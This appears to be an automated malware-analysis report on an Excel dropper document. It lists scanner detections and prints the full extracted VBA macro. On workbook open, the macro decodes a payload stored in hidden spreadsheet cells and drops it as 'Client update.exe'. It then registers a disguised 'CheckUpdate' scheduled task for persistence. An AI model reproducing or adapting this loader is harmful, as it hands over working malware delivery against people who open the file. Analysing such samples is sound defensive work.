MALICIOUS
236
Risk Score
Heuristics 7
-
ClamAV: Xls.Dropper.Agent-7578024-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7578024-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set f = CreateObject("Scripting.FileSystemObject") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set f = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
un = Environ("us" & "er" & "name")
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5746 bytes |
SHA-256: 53c14314dd7ee32b7caf2a857e484801086b81f5bd18b5511e700088211b8fad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
'Dim cellRange As Range
'Set cellRange = ActiveSheet.Range("B5:F5")
'For i = 1 To 5
' MsgBox cellRange.Cells(1, i).Value
'Next
Dim name As String
Dim save As String
Dim savep As String
Dim un As String
un = Environ("us" & "er" & "name")
savep = "C:\" & "Users\" & un & "\vals"
name = "firefox"
Dim lineText As String
lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z101").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z102").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z103").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z104").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z105").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z106").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z107").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z108").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z109").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z110").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z111").Value
'example1
Dim lst As Long
Dim counter As Long
Dim length As Long
length = 1
lst = Len(lineText)
Dim dec() As Byte
'resize to n means n+1 byte
ReDim Preserve dec(lst / 2 - 1)
counter = 1
While counter < lst
dec(counter \ 2) = Asc(Mid(lineText, counter, length)) - 67 + (Asc(Mid(lineText, counter + 1, length)) - 67) * 16
counter = counter + 2
Wend
save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)
'example2
If Application.MouseAvailable Then
Set f = CreateObject("Scripting.FileSystemObject")
If Not f.FileExists(savep & "\" & save) Then
If Dir(savep, vbDirectory) = "" Then
On Error Resume Next
MkDir savep
End If
Dim fileNo As Integer
fileNo = FreeFile
On Error Resume Next
Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
Put #fileNo, 1, dec
Close #fileNo
'unz
Set SA = CreateObject("Shell.Application")
SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
c = crtt(savep, save, un)
End If
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetHidden
'ActiveWorkbook.save
End If
End Sub
Function crtt(savep, save, un)
Dim dom As String
dom = Environ("user" & "domain")
Set s = CreateObject(inv("ivres.elude"))
'its important
Call s.Connect
'not important
Set f = s.getFolder("\")
Set n = s.NewTask(0)
'it is not me
Set r = n.RegistrationInfo
r.Author = "MS"
'and may not
r.Description = "CheckUpdate"
Set p = n.Principal
p.LogonType = 3
'hehehehe
With n.settings
.Enabled = True
.runonlyifidle = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
'1 for tie trigger, 9 for at logon
Set t = n.triggers.Create(1)
t.Enabled = True
t.ID = "TID"
'4 min from now
t.startBoundary = XmlTime(DateAdd("n", 4, Now()))
Set t2 = n.triggers.Create(9)
t2.Enabled = True
t2.ID = "T2ID"
t2.UserId = dom & "\" & un
Set a = n.Actions.Create(0)
a.Path = savep & "\" & save
a.Arguments = "..."
' and in the now we can
Call f.RegisterTaskDefinition("CheckUpdate", n, 6, , , 3)
End Function
Function inv(x As String)
Dim a As String
Dim counter As Integer
a = ""
counter = Len(x)
While counter >= 1
a = a + Mid(x, counter, 1)
counter = counter - 1
Wend
inv = "Sch" & a & "ce"
End Function
Function XmlTime(t)
Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
Dim tTime, tDate
cSecond = "0" & Second(t)
cMinute = "0" & Minute(t)
CHour = "0" & Hour(t)
cDay = "0" & Day(t)
cMonth = "0" & Month(t)
cYear = Year(t)
tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)
tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
XmlTime = tDate & "T" & tTime
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.